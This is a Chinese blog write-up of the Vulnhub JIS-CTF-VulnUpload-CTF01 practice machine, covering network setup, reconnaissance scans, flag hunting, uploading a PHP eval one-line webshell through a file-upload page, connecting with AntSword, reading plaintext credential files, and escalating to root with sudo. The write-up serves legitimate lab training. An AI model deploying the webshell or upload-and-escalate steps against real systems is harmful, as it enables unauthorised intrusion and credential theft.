【Vulnhub靶机】JIS-CTF-VulnUpload-CTF01靶机

已于 2023-11-25 12:54:52 修改
阅读量585 收藏 3
点赞数 2
分类专栏: # 靶机系列 文章标签: vulnhub 网络安全 靶场
于 2023-08-28 21:38:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZhaoSong_/article/details/132548855
版权

文章目录

JIS文档说明

JIS-CTF-VulnUpload-CTF01靶机下载地址

该靶机有5个flag

1、网卡配置

开启靶机,看见加载的进度条按shift,看到如下界面:

image-20230828203117026

然后按e键,修改 如下

rw signie init=/bin/bash    # rw读写 signie单用户 命令权限/bin/bash

image-20230828202442490

改完之后Ctrl+x进入单用户模式

先查看我们靶机的网卡名称ip a

image-20230828203322016

然后来到靶机vim /etc/network/interfaces下,进行网卡配置,

网卡默认配置如下

image-20230828202823803

进行网卡配置修改如下:

image-20230828203415086

然后重启网卡

/etc/init.d/networking restart

重启靶机

2、信息收集

靶机MAC:00:0C:29:09:00:9D

主机发现
sudo arp-scan -l

image-20230828203726965

端口扫描
sudo nmap -A -p- 192.168.80.140

image-20230828204026500

目录扫描
sudo dirsearch -u 192.168.80.140

image-20230828204421711

dirb http://192.168.80.140

image-20230828204802515

3、漏洞探测

访问flag http://192.168.80.140/flag/
找到第一个flag

image-20230828204943711

访问robots.txt

http://192.168.80.140/robots.txt

image-20230828205038544

访问login.php

http://192.168.80.140/login.php

image-20230828205224719

发现没有什么发现,继续 看看其他目录

访问admin_area,打开F12 ,发现第二个flag

image-20230828205325814

​ username : admin
​ password : 3v1l_H@ck3r
​ The 2nd flag is : {7412574125871236547895214}

前往登录页面进行登录

image-20230828205519547

发现是一个文件上传的界面,我们可以上传一句话木马尝试得到 shell

4、漏洞利用

一句话木马

编辑一句话木马1.php

<?php  @eval($_REQUEST[6868])?>

在刚才的robots.txt文件里,又跟上传相关的

image-20230828205900277

访问http://192.168.80.140/uploads报错

访问http://192.168.80.140/uploaded_files/页面没反应,但是也没有报错,

继续访问http://192.168.80.140/uploaded_files/1.php,页面也没有报错

蚁剑 GetShell

URL地址:http://192.168.80.140/uploaded_files/1.php

连接密码:6868

image-20230828210153091

查找跟flag有关的文件

find / -name 'flag*' 2>/dev/null

image-20230828211756499

发现没有权限访问/var/www/html/flag.txt

/var/www/html/hint.txt里发现第三个 flag

image-20230828210507525

image-20230828210528853

尝试使用technawi密码来读取flag.txt文件,你可以在一个隐藏文件找到它

使用find命令查找

find / -user 'technawi' 2>/dev/null

image-20230828211332299

cat /etc/mysql/conf.d/credentials.txt

image-20230828211342164

得到technawi用户的密码

username : technawi
password : 3vilH@ksor

SSH连接

使用ssh连接ssh technawi@192.168.80.140,查看该用户能以root身份执行哪些文件,发现有所有的权限

image-20230828211958588

然后去看看/var/www/html/flag.txt,得到第五个flag

image-20230828212058326

提权
sudo su

image-20230828212336617

过期的秋刀鱼-
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。前文学习:[网络
CTF6靶机实战.zip
05-25
CTF6靶机实战包括三部分: 1)靶机实战过程 2)文件上传的反弹shell文件(shell.php) 3)系统版本漏洞需要的文件(8478.sh)
CTF6渗透测试全流程练习靶机
12-14
CTF6渗透测试全流程练习靶机
Cardinal:CTF:triangular_flag: AWD (Attack with Defense) 线下赛平台 AWD platform - 欢迎 Star~ :sparkles:
05-06
—— CTF AWD 线下赛平台 介绍 Cardinal 是由 Vidar-Team 开发的 AWD 比赛平台,使用 Go 编写。本程序可以作为 CTF 线下比赛平台,亦可用于团队内部 AWD 模拟练习。 更多图片 (该 AWD 实时 3D 攻击大屏为项目 ,已适配接入 Cardinal) 文档 官方文档 cardinal.ink 请您在使用前认真阅读官方使用文档,谢谢 ♪(・ω・)ノ 教程 AWD平台搭建–Cardinal 功能介绍 管理员创建题目、分配题目靶机、参赛队伍、生成 Flag、发布公告 支持上传参赛队伍 Logo 题目可设置状态开放、下线,队伍分数同步更新 批量生成 Flag 并导出,方便 Check bot 每轮结束后自动结算分数,并更新排行榜 自动对分数计算正确性进行检查 分数计算异常日志提醒 自定义攻击、Checkdown 分数 队伍平分靶机分数 自动更新靶机 Fla
信息安全_.第六期.CTF.Web之Vulnhub靶场.课件资料.pptx
08-14
1.Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,每个镜像会有破解的目标。 2.通过Vulnhub靶场靶机实战讲解从信息收集到获得root权限拿到flag。 3.分享个人线下CTF解题和AWD混合对战经验和感受。
VulnHub系列】JIS-CTF-VulnUpload-CTF01靶机
薛定谔嘚喵博客
03-13 536
靶机一共需要找到5个flag。首先是对靶机的信息收集(包括端口的开放情况以及网站目录的扫描爆破),其中是发现了网页中存在文件上传漏洞,利用一句话木马上传到目标靶机中,再利用蚁剑进行连接(也可以使用Kali自带的weevely进行木马文件上传)。最后nc反弹shell,grep遍历得到flag5,sudo提权。
Vulnhub】之JIS-CTF-VulnUpload-CTF01
zg_111的博客
03-28 1788
靶机一共找到了5个flag,分别通过端口扫描、网站目录扫描得到账密成功登录网站,并通过发现文件上传漏洞,利用一句话木马传到靶机,再通过蚁剑进行连接,最后查找并登录technawi用户查看隐藏文件flag.txt得到全部flag。
Vulnhub靶机 JIS-CTF-VulnUpload-CTF01详解
2301_76690905的博客
10-24 162
每个设备都会被分配一个唯一的IP地址,以便进行通信。passwd:30:technawi:x:1000:1000:technawi,,,:/home/technawi:/bin/bash:这是系统用户密码文件(passwd)中的一行,其中包含了"technawi"的用户名及其相关信息。我们能够定位到mysql/conf.d/credentials.txt,打开/etc/mysql/conf.d/credentials.txt,得到flag和用户technawi的密码,去到kali使用ssh登录。
Vulnhub靶机渗透之环境搭建及JIS-CTF入门
qq_61702710的博客
07-15 2210
写道这里,这篇文章讲解完毕,后续会更深入的分享。netdiscover 用于发现目标ipnmap进行端口扫描dirb进行目录扫描敏感文件获取及分析php木马生成和蚁剑工具ssh远程连接sudo提权数据库脱裤相关内容整理于网上,侵权删。
CTF靶场集合大放送(非常详细)零基础入门到精通,收藏这一篇就够了
logic1001的博客
04-01 1073
后续的主要关注点会在 vulfocus 和 RootTheBox 上。
渗透测试——JIS-CTF-VulnUpload-CTF01
m0_63641882的博客
01-14 398
靶机难度:简单(适合新手)提示:Description: There are five flags on this machine. Try to find them. It takes 1.5 hour on average to find all flags. 一共有五个flag。
靶场训练笔记-ctf训练营WEB方向第一章新手村1第6题:ezinclude
ddingddding的博客
08-21 476
对网址为ctf.hetianlab.com的ctf训练营WEB方向第一章新手村1第6题:ezinclude的做题全过程
封神台——高校靶场ctf——第一期Web web_001
m0_52738557的博客
06-21 302
难度:⭐ 首先点击传送门打开相应的题目可以看到 这样一个画面,一个链接不到的反应,但题目以及告诉,F12就完事。 显然答案没有在这直接显示,再看看网络监视器查看传输中有没有什么线索可以看到flag出现了,但这是错误的答案,再通过源码看看数据包中有没有其他线索 可疑目标出现,有一个js文件我们点开得到一串提示, fromCharCode() 通过指定 Unicode 值,得到一个字符串 我们可以通过html的代码进行解析,在 菜鸟教程在线编辑器-fromCharCode() 中进行解析 将要转换的数据输入
CTF 三大测试靶场搭建:DVWA、SQLi-LABS、upload-labs 靶场部署教程(VM + CentOS 7 + Docker)
zatongtong的博客
01-18 1609
基于 CentOS 7 系统,利用 Docker 部署 DVWA、SQLi-LABS、upload-labs 靶场靶场的初始化,Docker 基本使用
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8254
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip
05-31
【优质项目推荐】 1、项目代码均经过严格本地测试,运行OK,确保功能稳定后才上传平台。可放心下载并立即投入使用,若遇到任何使用问题,随时欢迎私信反馈与沟通,博主会第一时间回复。 2、项目适用于计算机相关专业(如计科、信息安全、数据科学、人工智能、通信、物联网、自动化、电子信息等)的在校学生、专业教师,或企业员工,小白入门等都适用。 3、该项目不仅具有很高的学习借鉴价值,对于初学者来说,也是入门进阶的绝佳选择;当然也可以直接用于 毕设、课设、期末大作业或项目初期立项演示等。 3、开放创新:如果您有一定基础,且热爱探索钻研,可以在此代码基础上二次开发,进行修改、扩展,创造出属于自己的独特应用。 欢迎下载使用优质资源!欢迎借鉴使用,并欢迎学习交流,共同探索编程的无穷魅力! 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip
六一儿童节快乐!(六一儿童节庆祝代码)Vue开发
最新发布
05-31
六一儿童节快乐!(六一儿童节庆祝代码)Vue开发 like Project setup npm install Compiles and hot-reloads for development npm run serve Compiles and minifies for production npm run build Lints and fixes files npm run lint Customize configuration
uniapp聊天工具源码.zip
05-31
提供的源码资源涵盖了安卓应用、小程序、Python应用和Java应用等多个领域,每个领域都包含了丰富的实例和项目。这些源码都是基于各自平台的最新技术和标准编写,确保了在对应环境下能够无缝运行。同时,源码中配备了详细的注释和文档,帮助用户快速理解代码结构和实现逻辑。 适用人群: 这些源码资源特别适合大学生群体。无论你是计算机相关专业的学生,还是对其他领域编程感兴趣的学生,这些资源都能为你提供宝贵的学习和实践机会。通过学习和运行这些源码,你可以掌握各平台开发的基础知识,提升编程能力和项目实战经验。 使用场景及目标: 在学习阶段,你可以利用这些源码资源进行课程实践、课外项目或毕业设计。通过分析和运行源码,你将深入了解各平台开发的技术细节和最佳实践,逐步培养起自己的项目开发和问题解决能力。此外,在求职或创业过程中,具备跨平台开发能力的大学生将更具竞争力。 其他说明: 为了确保源码资源的可运行性和易用性,特别注意了以下几点:首先,每份源码都提供了详细的运行环境和依赖说明,确保用户能够轻松搭建起开发环境;其次,源码中的注释和文档都非常完善,方便用户快速上手和理解代码;最后,我会定期更新这些源码资源,以适应各平台技术的最新发展和市场需求。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

过期的秋刀鱼-

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值